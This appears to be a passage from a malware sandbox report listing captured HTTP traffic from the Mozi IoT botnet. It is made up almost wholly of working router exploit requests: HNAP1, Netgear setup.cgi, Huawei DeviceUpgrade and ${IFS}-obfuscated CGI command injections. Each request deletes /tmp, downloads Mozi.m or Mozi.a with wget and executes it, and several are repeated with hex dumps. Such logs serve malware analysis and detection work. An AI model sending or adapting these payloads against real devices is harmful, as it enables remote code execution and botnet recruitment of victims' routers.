                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 205.79.22.178:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 8.189.90.201:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 177.77.86.253:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 128.118.97.120:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 156.208.190.13:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 169.158.193.51:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 54.147.224.110:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
